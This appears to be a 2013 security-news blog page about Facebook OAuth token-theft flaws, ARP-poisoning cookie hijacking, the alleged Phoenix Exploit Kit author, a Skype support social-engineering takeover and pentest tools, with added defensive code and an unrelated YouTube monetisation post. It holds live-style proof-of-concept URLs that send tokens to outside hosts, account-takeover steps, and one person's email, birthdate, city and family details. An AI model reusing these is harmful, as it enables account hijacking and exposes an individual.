Thursday, April 25, 2013

URL REDIRECTION FLAW IN FACEBOOK APPS PUSH OAUTH VULNERABILITY BACK IN ACTION

In earlier posts, Facebook hacker Nir Goldshlager exposed two serious Facebook OAuth flaws: first, hijacking a Facebook account even when the user has not installed any application on their account, and second, various ways of bypassing the regex protection in Facebook OAuth.

This time, Nir illustrated an attack scenario: what happens when an application is installed on the victim's account, and how easily an attacker can manipulate it. According to the hacker, if the victim has an installed application such as Skype or Dropbox, the attacker is still able to take control of their account.

For this, an attacker needs only a URL redirection or cross-site scripting vulnerability on the domain of the app's owner; in this scenario, that is the Skype Facebook app. Many bug bounty programs, such as Google's, do not consider URL redirection a valid vulnerability eligible for a reward.

Nir also demonstrated that an attacker is even able to learn which applications their victims are using. Example URL: https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m

Because Facebook applications are developed by third-party developers, who actually own the app, Facebook itself was unable to fix such potentially pernicious site redirection attacks.

Continuing the method used in the last two OAuth flaws (mentioned here), this time the attack uses the app's redirection flaw in the redirect_uri / next parameter to steal the access_token of Facebook users.

POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1

POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1

The hacker's goal is simply to steal the victim's access_token through these Facebook OAuth flaws, so that he can take full remote control of the victim's account without knowing their password.

ANOTHER WAY TO HACK FACEBOOK ACCOUNTS USING OAUTH VULNERABILITY

In recent months, white hat hacker Nir Goldshlager reported many critical bugs in the Facebook OAuth mechanism that allowed an attacker to hijack any Facebook account without user interaction.

Another hacker, Amine Cherrai, reported a new Facebook OAuth flaw whose exploitation is very similar to Nir Goldshlager's findings, but via a new, unpatched route.

If you are aware of the vulnerability used against Facebook OAuth through the redirect_uri parameter, Amine Cherrai found another way to bypass the patch applied by the Facebook security team.

He found another file on Facebook that allows redirection and can be used to steal the access_token of victims' accounts, i.e. http://facebook.com/connect/xd_arbiter.php?#&origin=http://facebook.com/
Successful exploitation once again allowed the hacker to hijack Facebook accounts via the OAuth flaw.

Proof of concept:
http://facebook.com/dialog/oauth?client_id=350685531728&response_type=token&display=page&redirect_uri=http%3A%2F%2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F
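Both the Skype/Dropbox "next" POCs above and the xd_arbiter.php variant work because the authorization server sends the token to a redirect target it did not strictly verify, and that target then forwards the URL (token fragment included) somewhere else. The following is an added example written for this page, not code from the posts, from Nir Goldshlager or Amine Cherrai, or from Facebook: a strict redirect_uri validator of the kind an OAuth authorization server should apply. It uses exact-match registration plus a refusal of any target that itself forwards to a second URL. All app ids, hostnames and registered URIs are constructed for the demo (the app ids are reused from the page only as dictionary keys; the registered URIs for them are invented).

```python
"""Strict OAuth redirect_uri validation (added example, constructed data)."""
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed registry: app id -> the exact redirect URIs the app registered.
# Real registration data is not on the page; these are placeholders.
REGISTERED_REDIRECTS = {
    "260273468396": {"https://login.skype.example/fb/callback"},
    "350685531728": {"https://app.example.com/oauth/callback"},
    # A legitimately registered endpoint that is itself an open redirector:
    "111111111111": {"https://legacy.example.net/redir?url=https://legacy.example.net/home"},
}

# Query keys commonly used by forwarding endpoints (assumption: a heuristic list).
FORWARDING_PARAMS = ("url", "next", "redirect", "redirect_uri", "return", "goto", "dest", "continue")


def looks_like_open_redirector(uri):
    """True if the URI's query or fragment carries another URL, i.e. the shape
    http://host/redir?url=http://other or .../xd_arbiter.php?#...origin=http://other.
    A token sent there would be forwarded on, so it must be refused even when
    the host itself belongs to the app owner."""
    parts = urlsplit(uri)
    for blob in (parts.query, parts.fragment):
        decoded = unquote(blob)          # catch %3A%2F%2F as well as ://
        if "://" in decoded:
            return True
        for key, values in parse_qs(decoded, keep_blank_values=True).items():
            if key.lower() in FORWARDING_PARAMS and any(v.startswith("//") for v in values):
                return True              # protocol-relative forward
    return False


def check_authorize_request(dialog_url):
    """Decide whether an authorization-dialog request (app_id/client_id plus
    next or redirect_uri) may receive a token. Returns (allowed, reason)."""
    q = parse_qs(urlsplit(dialog_url).query)
    app_id = (q.get("app_id") or q.get("client_id") or [""])[0]
    target = (q.get("redirect_uri") or q.get("next") or [""])[0]
    if not app_id or not target:
        return False, "missing app id or redirect target"
    # Exact string match: no prefix matching, no regex, no "same host" logic.
    if target not in REGISTERED_REDIRECTS.get(app_id, set()):
        return False, "redirect target is not exactly registered for this app"
    if urlsplit(target).scheme != "https":
        return False, "redirect target must be https"
    if looks_like_open_redirector(target):
        return False, "redirect target forwards to a second URL"
    return True, "ok"


# Constructed requests mirroring the shapes discussed on the page.
ATTACK_VIA_OPEN_REDIRECT = (
    "https://auth.example/dialog/permissions.request?app_id=260273468396&display=page"
    "&next=http://metrics.skype.example/REDIR/?url=http://attacker.example"
    "&response_type=token&fbconnect=1")
ATTACK_VIA_FRAGMENT = (
    "https://auth.example/dialog/oauth?client_id=350685531728&response_type=token&display=page"
    "&redirect_uri=http%3A%2F%2Fm.auth.example%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps"
    "%2Fdemo%2F%3F%26origin%3Dhttp%3A%2F%2Fattacker.example%2F")
LEGITIMATE = (
    "https://auth.example/dialog/oauth?client_id=350685531728&response_type=token"
    "&redirect_uri=https%3A%2F%2Fapp.example.com%2Foauth%2Fcallback")
REGISTERED_BUT_FORWARDING = (
    "https://auth.example/dialog/oauth?client_id=111111111111&response_type=token"
    "&redirect_uri=https%3A%2F%2Flegacy.example.net%2Fredir%3Furl%3Dhttps%3A%2F%2Flegacy.example.net%2Fhome")

if __name__ == "__main__":
    for name, url in [("open-redirect next", ATTACK_VIA_OPEN_REDIRECT),
                      ("fragment forwarder", ATTACK_VIA_FRAGMENT),
                      ("legitimate", LEGITIMATE),
                      ("registered but forwarding", REGISTERED_BUT_FORWARDING)]:
        print(f"{name:28s} -> {check_authorize_request(url)}")
```

The third registered app shows why exact matching alone is not enough: an app owner may register a redirect endpoint that is itself an open redirector, which is precisely the third-party weakness the post says Facebook could not fix on its own. Refusing such targets at the authorization server closes that gap regardless of what the app domain does.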

LEARN HOW TO HACK FACEBOOK ACCOUNTS VIA ARP POISONING

Compromising Facebook Account Via ARP Poisoning is an e-book written by Deep. The book explains the "ARP Poisoning Attack", also known as the "Man in the Middle Attack". It uses the packet sniffer Wireshark to capture packets, specifically the cookie. It shows how Wireshark sniffs the packets and captures Facebook's authentication cookie, and how using the victim's authentication cookie in place of our own allows a Facebook account to be compromised easily. In this book/white paper we see how a Facebook account can be hacked over a LAN with ARP poisoning or MitM.

DOWNLOAD : http://adf.ly/NhVGi
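ARP poisoning of the kind the e-book describes leaves a footprint on the LAN: the gateway's IP suddenly answers from a second MAC address, and one MAC starts claiming several IPs. The following is an added example, not code from the e-book or its author: a small ARP reply monitor that raises alerts on both signals. The capture is constructed and embedded so the script runs offline; addresses, MACs and the static gateway entry are invented for the demo.

```python
"""ARP poisoning detector over a constructed capture (added example)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float          # seconds since capture start
    sender_ip: str     # the IP the reply claims to speak for
    sender_mac: str    # the MAC it maps that IP to
    target_ip: str     # who the reply was sent to


# Constructed capture: 10.0.0.1 is the gateway, 10.0.0.7 the victim. At t=30
# a new MAC starts claiming the gateway's IP towards the victim and the
# victim's IP towards the gateway: the two-sided poisoning used for MitM.
SAMPLE_REPLIES = [
    ArpReply(1.0,  "10.0.0.1", "aa:aa:aa:aa:aa:01", "10.0.0.7"),
    ArpReply(2.0,  "10.0.0.7", "aa:aa:aa:aa:aa:07", "10.0.0.1"),
    ArpReply(30.0, "10.0.0.1", "de:ad:be:ef:00:99", "10.0.0.7"),
    ArpReply(30.1, "10.0.0.7", "de:ad:be:ef:00:99", "10.0.0.1"),
    ArpReply(31.0, "10.0.0.1", "de:ad:be:ef:00:99", "10.0.0.7"),
]

# Static mapping a defender would pin for the gateway (constructed value).
TRUSTED = {"10.0.0.1": "aa:aa:aa:aa:aa:01"}


def detect_arp_poisoning(replies, trusted=TRUSTED):
    """Return a list of alert tuples. Signals:
    ("mac_change", ts, ip, old_mac, new_mac): an IP's MAC differs from the
        static entry or from the first MAC seen for it;
    ("mac_claims_multiple_ips", ts, mac, [ips]): one MAC now claims a new,
        additional IP (fired once per newly added IP)."""
    alerts = []
    ip_to_mac = dict(trusted)
    mac_to_ips = defaultdict(set)
    for r in replies:
        known = ip_to_mac.get(r.sender_ip)
        if known is None:
            ip_to_mac[r.sender_ip] = r.sender_mac      # first sighting: learn it
        elif known != r.sender_mac:
            alerts.append(("mac_change", r.ts, r.sender_ip, known, r.sender_mac))
        before = len(mac_to_ips[r.sender_mac])
        mac_to_ips[r.sender_mac].add(r.sender_ip)
        if len(mac_to_ips[r.sender_mac]) > 1 and len(mac_to_ips[r.sender_mac]) > before:
            alerts.append(("mac_claims_multiple_ips", r.ts, r.sender_mac,
                           sorted(mac_to_ips[r.sender_mac])))
    return alerts


def poisoned_ips(replies, trusted=TRUSTED):
    """Convenience view: the set of IPs whose MAC mapping was overwritten."""
    return {a[2] for a in detect_arp_poisoning(replies, trusted) if a[0] == "mac_change"}


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES):
        print(alert)
    print("poisoned:", sorted(poisoned_ips(SAMPLE_REPLIES)))
```

On a real network the `ArpReply` records would be filled from a packet capture of ARP opcode-2 frames; the static `TRUSTED` entry is the same idea as pinning the gateway in the host ARP cache, and is what turns the first rogue reply into an immediate alert rather than a silently learned mapping.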

HUNTING RUSSIAN MALWARE AUTHOR BEHIND PHOENIX EXPLOIT KIT

Exploit kits are among the most dangerous cybercrime tools; the Phoenix Exploit Kit is a good example of an exploit pack used to exploit vulnerable software on the computers of unsuspecting Internet users.

The Phoenix Exploit Kit is sold by its author on the underground market for a base price of $2,200. Like other exploit kits, Phoenix is built to exploit browser-based vulnerabilities in outdated and insecure versions of browser plugins such as Java, Adobe Flash and Adobe Reader.

The developer of Phoenix is known by the nickname AlexUdakov on several forums. According to a new investigation report published by KrebsOnSecurity, AlexUdakov was also a member of a forum called Darkode, whose administrator accounts were compromised a few weeks earlier; the intruders were able to gain access to the administrators' private communications.

The intruders were able to view the full profiles and database of Darkode members, including their private email addresses; AlexUdakov was using the address “nrew89@gmail.com”.

On further investigation, authorities found Andrey Anatolevich Alexandrov, a 23-year-old male (born May 20, 1989) from Yoshkar-Ola, profiled on the Russian social media site Vkontakte with the same email address. He currently lives in a 365-square-foot apartment in Yoshkar-Ola with his wife and small child.

He is also a member of many Russian-language forums and websites dedicated to discussing guns, including talk.guns.ru and popgun.ru. Investigators also found him on another criminal website, exploit.in, where he had been selling the Phoenix Exploit Kit for many months until around July 2012; after that, his account remained silent until February 2013.

In his latest post on the same forum, he explained to his kit and gun clients that he had been arrested by the Federal Security Service (FSB), the Russian security agency, for distributing malware and for the illegal possession of firearms, including two AKS-74U assault rifles, a Glock, a TT (a Russian-made pistol) and a PM (also known as a Makarov).

It is not proven that Andrey Anatolevich Alexandrov is really behind the development of the Phoenix Exploit Kit, but the investigation may now help authorities reach the actual criminal soon.

In any case, users are advised to always keep the applications installed on their computers up to date so they can avoid possible exploit attacks.

SOCIAL ENGINEERING SKYPE SUPPORT TEAM TO HACK ANY ACCOUNT INSTANTLY

You can install the industry's strongest and most expensive firewall. You can educate employees about basic security procedures and the importance of choosing strong passwords. You can even lock down the server room, but how do you protect a company from the threat of social engineering attacks?

For any of you that are involved in security awareness efforts, you know what I am talking about. It could happen tomorrow, it could happen today or it might already have happened.

In a recent disclosure, renowned hacker and developer DarkCoderSc (Jean-Pierre LESUEUR) explained how one can easily socially engineer the Microsoft Skype support team to get access to any Skype account.

From a social engineering perspective, employees are the weak link in the chain of security measures. He simply used the weakness of the Skype password recovery system itself.

One simply needs to contact Skype support and ask for the password to be changed. After that initial step, one needs to prove ownership of the requested account: you must give the support desk 5 contacts of the account.

"That's easy because you just have to add 5 fake temporary accounts to the target account and it's done. Another option is to simply ask the target what people he knows on Skype. That option wasn't that hard because I have over 1000 contacts," he says of the trick.

Within a few seconds, an attacker can become the owner of any victim's account by providing very basic information to the support team.

"Also Microsoft’s Support Team should make a serious effort to communicate better to their customers. At the moment they do not seem to care that much about their customers."

Social engineering is the act of manipulating a person in order to gain access or sensitive data by preying on basic human psychology. Still, there is no patch for human stupidity!

HAVIJ SQL INJECTION - by SHINE SREEDHAR

Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. What makes Havij different from similar tools is its injection methods: its success rate at injecting vulnerable targets is more than 95%. The user-friendly GUI (graphical user interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.

PANOPTIC - PENETRATION TESTING TOOL FOR HUNTING LFI VULNERABILITIES

Panoptic is a tool that searches for commonly known files through LFI vulnerabilities. Local file inclusion is a vulnerability that allows an attacker to read files stored locally on the server through the web application. It happens because the application's code does not properly sanitize the value passed to the include() function. To get started, you will need Python 2.6+. Panoptic displays the file paths it finds and can save the actual files as well. You can download Panoptic here.
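The root cause named above is an include() whose argument is taken from the request unsanitized, so a page name like a traversal sequence resolves outside the intended directory. The following is an added example, not Panoptic's code and not PHP: a Python 3 resolver (the logic is the same as one would write around PHP's include()) that maps a request-supplied page name onto a fixed template directory and rejects anything that escapes it. It creates a throwaway template directory so it runs offline; the page names and directory are constructed for the demo.

```python
"""Hardened include-path resolution against LFI (added example)."""
import os
import re
import tempfile

PAGE_NAME = re.compile(r"[A-Za-z0-9_-]+")   # allow-list: no dots, no separators


class IncludeRejected(Exception):
    """Raised when a requested page name must not be included."""


def make_demo_templates():
    """Create a throwaway template directory with two legitimate pages
    (constructed content) and return its path."""
    root = tempfile.mkdtemp(prefix="lfi_demo_")
    for name in ("home", "about"):
        with open(os.path.join(root, name + ".html"), "w") as fh:
            fh.write(f"<h1>{name}</h1>")
    return root


def resolve_include(root, page):
    """Return the absolute path to include, or raise IncludeRejected.
    Layers, each sufficient on its own for most inputs:
      1. reject empty names and embedded NUL bytes (classic extension trick);
      2. allow-list the character set, which removes '.', '/', '\\' and encodings;
      3. append a fixed extension so the caller cannot pick the file type;
      4. canonicalize and check the result is still inside root, which holds
         even if layers 1-3 are weakened later (symlinks included)."""
    if not page or "\x00" in page:
        raise IncludeRejected("empty or NUL byte in page name")
    if not PAGE_NAME.fullmatch(page):
        raise IncludeRejected("page name may only contain [A-Za-z0-9_-]")
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, page + ".html"))
    if os.path.commonpath([root, candidate]) != root:
        raise IncludeRejected("resolved path escapes template root")
    if not os.path.isfile(candidate):
        raise IncludeRejected("no such page")
    return candidate


def render(root, page):
    """The safe counterpart of include($_GET['page']): resolve, then read."""
    with open(resolve_include(root, page)) as fh:
        return fh.read()


def classify(root, page):
    """Return 'ok' or the rejection reason, for a quick self-check."""
    try:
        resolve_include(root, page)
        return "ok"
    except IncludeRejected as exc:
        return str(exc)


if __name__ == "__main__":
    root = make_demo_templates()
    # Constructed inputs: two legitimate pages and typical traversal attempts.
    for page in ("home", "about", "../../etc/passwd", "....//....//etc/passwd",
                 "home\x00.png", "missing", ""):
        print(f"{page!r:28s} -> {classify(root, page)}")
```

The containment check in layer 4 is the one to keep even when the allow-list feels sufficient: it is the check that still holds after someone later relaxes the regex to permit subdirectories or dots.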

Saturday, April 20, 2013

How To Make Money On YouTube

However, the process of becoming a YouTube partner is not as trivial as becoming an AdSense publisher. Below you’ll find the basic steps you need to go through:

1. Make Sure You Have an AdSense Account

      While the process to be able to display ads on your YouTube videos is a separate one, your earnings and stats will go together with your AdSense account, so you need to have one.
     In theory you could apply to become a YouTube partner before having an AdSense account, and in case you get accepted you would then follow up with an AdSense application. I believe the other way around is much simpler, though.


2. Grow Your Audience on YouTube

       One of the most important criteria the YouTube guys will use to evaluate your application is the audience you reach on YouTube. They don’t reveal what are the requirements, but I’ve seen many people say these are the ballpark numbers you need to have before getting accepted:
  • at least 1,000 subscribers
  • at least 1,000 views on all your videos
  • at least 10,000 channel views
      These are the very minimum though, if you want to make sure you’ll get accepted I would aim for 5,000 subscribers, 50,000 channel views and over 1,000,000 upload views total.

3. Get Videos Out There Regularly

      If you only have one or two videos uploaded your chances of getting accepted are low, even if those videos went viral. That’s because YouTube is looking for people who are planning to work with them over the long term.
    The more regularly and frequently you upload new videos, the better. For instance, someone who uploads a new video every day will have a better chance of getting accepted than someone who uploads one every couple of weeks.
     You also want to make sure you have at least 100 uploaded videos before applying to become a partner (though some people say 50 will be enough).

4. Develop A Brand Around Your Videos

    This step is not essential, but I think it helps a lot in getting approved. You need to remember that, once you meet the technical guidelines, it will be a person on the other side deciding whether you are a good fit for becoming a YouTube Partner or not. In other words, the more professional you look, the higher your chances.
Practical tips include:
  • Create a website to host your videos and give your audience more ways to interact
  • Create a nice logo and use it everywhere
  • Use a watermark on your videos with your logo
  • Consider getting a professional intro made for your videos
  • Customize your YouTube channel to make it look professional

5. Make Sure Your Content Has Zero Copyrighted Material

       If there's one thing that will get your application rejected on the spot, it is copyright infringement, so make sure you have zero copyrighted material in your videos.
       This includes images, graphics, logos, video clips and audio. For instance, even just using music in the background which you don't have permission for could get your application rejected.

6. Apply to Become a YouTube Partner

     After you followed all the previous steps you are ready to apply. You can do that via the official YouTube Partner Program page. It might take a while to get your application considered due to the load of people applying, but once you get accepted you’ll be able to start displaying ads on your videos right away.